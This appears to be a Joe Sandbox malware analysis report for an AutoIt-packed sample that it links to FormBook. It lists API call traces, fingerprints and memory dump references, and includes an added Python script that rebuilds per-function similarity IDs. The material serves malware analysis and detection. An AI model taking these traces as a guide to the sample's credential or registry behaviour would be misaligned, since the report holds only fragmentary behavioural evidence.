• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
• Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
• Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
• Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00472C51
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
• Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
• Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
• Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
• Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
• Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
• Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
Strings
Similarity
• API ID:
• String ID: N@
• API String ID: 0-1509896676
• Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
• Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
• Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
• Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• DeleteObject.GDI32(?), ref: 0045953B
• DeleteObject.GDI32(?), ref: 00459551
• DestroyWindow.USER32(?), ref: 00459563
• GetDesktopWindow.USER32 ref: 00459581
• GetWindowRect.USER32(00000000), ref: 00459588
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
• GetClientRect.USER32(00000000,?), ref: 004596F8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
• CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
• GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
• GlobalLock.KERNEL32(00000000), ref: 0045978F
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
• GlobalUnlock.KERNEL32(00000000), ref: 004597A5
• CloseHandle.KERNEL32(00000000), ref: 004597AC
• CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
• OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
• GlobalFree.KERNEL32(00000000), ref: 004597E2
• CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
• SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
• ShowWindow.USER32(?,00000004), ref: 00459865
• CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
• GetStockObject.GDI32(00000011), ref: 004598CD
• SelectObject.GDI32(00000000,00000000), ref: 004598D5
• GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
• DeleteDC.GDI32(00000000), ref: 004598F8
• _wcslen.LIBCMT ref: 00459916
• _wcscpy.LIBCMT ref: 0045993A
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
• SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
• GetDC.USER32(00000000), ref: 004599FC
• SelectObject.GDI32(00000000,?), ref: 00459A0C
• SelectObject.GDI32(00000000,00000007), ref: 00459A37
• ReleaseDC.USER32(00000000,00000000), ref: 00459A42
• MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                • API String ID: 4040870279-2373415609
                                                                                                                                                                                                                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                                                                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
APIs
• GetSysColor.USER32(00000012), ref: 0044181E
• SetTextColor.GDI32(?,?), ref: 00441826
• GetSysColorBrush.USER32(0000000F), ref: 0044183D
• GetSysColor.USER32(0000000F), ref: 00441849
• SetBkColor.GDI32(?,?), ref: 00441864
• SelectObject.GDI32(?,?), ref: 00441874
• InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
• GetSysColor.USER32(00000010), ref: 004418B2
• CreateSolidBrush.GDI32(00000000), ref: 004418B9
• FrameRect.USER32(?,?,00000000), ref: 004418CA
• DeleteObject.GDI32(?), ref: 004418D5
• InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
• FillRect.USER32(?,?,?), ref: 00441970
  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
• String ID:
• API String ID: 69173610-0
• Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
• Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
• Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
• Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
APIs
• DestroyWindow.USER32(?), ref: 004590F2
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
• CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
• GetClientRect.USER32(00000000,?), ref: 0045924E
• CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
• GetStockObject.GDI32(00000011), ref: 004592AC
• SelectObject.GDI32(00000000,00000000), ref: 004592B4
• GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
• DeleteDC.GDI32(00000000), ref: 004592D6
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
• GetStockObject.GDI32(00000011), ref: 004593D3
• SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
• Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
• Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
• Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
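The "API ID" and "String ID" lines under Similarity are the per-function fingerprints the report clusters on, and the CreateWindowExW class-name arguments ("AutoIt v3", "msctls_progress32") are what marks this function as the AutoIt interpreter's progress window rather than the FormBook payload. The following added example is not Joe Sandbox code: it parses trace lines of the form shown in this report and rebuilds both IDs for the function at 004590F2 (input copied from the listing above). The grouping rule it implements is inferred from the listings on this page and is an assumption, not documented Joe Sandbox behaviour; the "API String ID" hash is not reproduced because its algorithm is not visible here.

```python
"""Rebuild the per-function "API ID" / "String ID" fingerprints that the
report prints under "Similarity" from its raw API trace lines.

Added example, not Joe Sandbox code.  Grouping rule inferred from this page
(assumption): split each API name on CamelCase, drop tokens shorter than four
characters (Get, Set, Sys, Ex, W, DC, Pen, ...), count tokens over the function
and its listed subcalls, then emit tokens grouped by descending count,
alphabetical inside a group, with '$' between groups.  String ID is the set of
non-hex, non-'?' arguments, sorted.  Arguments containing ',' would be split
wrongly; none occur in this report.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# One trace line:  • [Part of subcall function XXXX: ]Name.MODULE(args), ref: ADDR
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")       # 32-bit immediates / pointers
_TOKEN = re.compile(r"[A-Z][a-z]*|_[a-z0-9]+")  # CamelCase words, or CRT names like _wcslen


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # call-site address
    subcall_of: Optional[int]   # callee address for "Part of subcall function" lines


def parse_trace(text: str) -> List[ApiCall]:
    """Parse bullet lines; headers such as "APIs" / "Strings" are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = m["args"].split(",") if m["args"] is not None else []
        caller = int(m["caller"], 16) if m["caller"] else None
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), caller))
    return calls


def name_tokens(api_name: str) -> List[str]:
    return [t for t in _TOKEN.findall(api_name) if len(t) >= 4]


def api_id(calls: List[ApiCall]) -> str:
    counts = Counter(t for c in calls for t in name_tokens(c.name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def string_id(calls: List[ApiCall]) -> str:
    strings = {a for c in calls for a in c.args if a not in ("", "?") and not _HEX_ARG.match(a)}
    return "$".join(sorted(strings))


def window_classes(calls: List[ApiCall]) -> set:
    """lpClassName is CreateWindowExW's second argument; "AutoIt v3" is the
    class the AutoIt runtime registers for its hidden main window."""
    return {c.args[1] for c in calls if c.name == "CreateWindowExW" and len(c.args) > 1}


# Input copied from the function at 004590F2 in the report above.
TRACE_004590F2 = """\
• DestroyWindow.USER32(?), ref: 004590F2
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
• CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
• GetClientRect.USER32(00000000,?), ref: 0045924E
• CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
• GetStockObject.GDI32(00000011), ref: 004592AC
• SelectObject.GDI32(00000000,00000000), ref: 004592B4
• GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
• DeleteDC.GDI32(00000000), ref: 004592D6
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
• GetStockObject.GDI32(00000011), ref: 004593D3
• SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
"""

if __name__ == "__main__":
    calls = parse_trace(TRACE_004590F2)
    print("API ID:   ", api_id(calls))
    print("String ID:", string_id(calls))
    print("Classes:  ", sorted(window_classes(calls)))
```

The same parser handles the indented "Part of subcall function" lines of the function at 0044181E, whose subcall tokens are folded into the same count; that is why "Select" appears in the 3-count group there although the outer function calls SelectObject once. Reproducing the ID locally is useful when comparing functions across reports from different sandbox versions, or when you want to match a function of the AutoIt runtime stub (this one is the progress window) so that it can be excluded from payload-focused analysis.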
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                                                                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                • API String ID: 1038674560-3360698832
                                                                                                                                                                                                                • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                                                                                                                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 00430754
• SetCursor.USER32(00000000), ref: 0043075B
• LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
• SetCursor.USER32(00000000), ref: 00430773
• LoadCursorW.USER32(00000000,00007F03), ref: 00430784
• SetCursor.USER32(00000000), ref: 0043078B
• LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
• SetCursor.USER32(00000000), ref: 004307A3
• LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
• SetCursor.USER32(00000000), ref: 004307BB
• LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
• SetCursor.USER32(00000000), ref: 004307D3
• LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
• SetCursor.USER32(00000000), ref: 004307EB
• LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
• SetCursor.USER32(00000000), ref: 00430803
• LoadCursorW.USER32(00000000,00007F85), ref: 00430814
• SetCursor.USER32(00000000), ref: 0043081B
• LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
• SetCursor.USER32(00000000), ref: 00430833
• LoadCursorW.USER32(00000000,00007F84), ref: 00430844
• SetCursor.USER32(00000000), ref: 0043084B
• LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
• SetCursor.USER32(00000000), ref: 00430863
• LoadCursorW.USER32(00000000,00007F02), ref: 00430874
• SetCursor.USER32(00000000), ref: 0043087B
• SetCursor.USER32(00000000), ref: 00430887
• LoadCursorW.USER32(00000000,00007F00), ref: 00430898
• SetCursor.USER32(00000000), ref: 0043089F
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Cursor$Load
• String ID:
• API String ID: 1675784387-0
• Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
• Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
• Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
• Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
APIs
• GetSysColor.USER32(0000000E), ref: 00430913
• SetTextColor.GDI32(?,00000000), ref: 0043091B
• GetSysColor.USER32(00000012), ref: 00430933
• SetTextColor.GDI32(?,?), ref: 0043093B
• GetSysColorBrush.USER32(0000000F), ref: 0043094E
• GetSysColor.USER32(0000000F), ref: 00430959
• CreateSolidBrush.GDI32(?), ref: 00430962
• GetSysColor.USER32(00000011), ref: 00430979
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
• SelectObject.GDI32(?,00000000), ref: 0043099C
• SetBkColor.GDI32(?,?), ref: 004309A6
• SelectObject.GDI32(?,?), ref: 004309B4
• InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
• GetWindowLongW.USER32(?,000000F0), ref: 00430A09
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
• GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
• InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
• DrawFocusRect.USER32(?,?), ref: 00430A91
• GetSysColor.USER32(00000011), ref: 00430A9F
• SetTextColor.GDI32(?,00000000), ref: 00430AA7
• DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
• SelectObject.GDI32(?,?), ref: 00430AD0
• DeleteObject.GDI32(00000105), ref: 00430ADC
• SelectObject.GDI32(?,?), ref: 00430AE3
• DeleteObject.GDI32(?), ref: 00430AE9
• SetTextColor.GDI32(?,?), ref: 00430AF0
• SetBkColor.GDI32(?,?), ref: 00430AFB
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1582027408-0
• Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
• Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
• Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
• Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
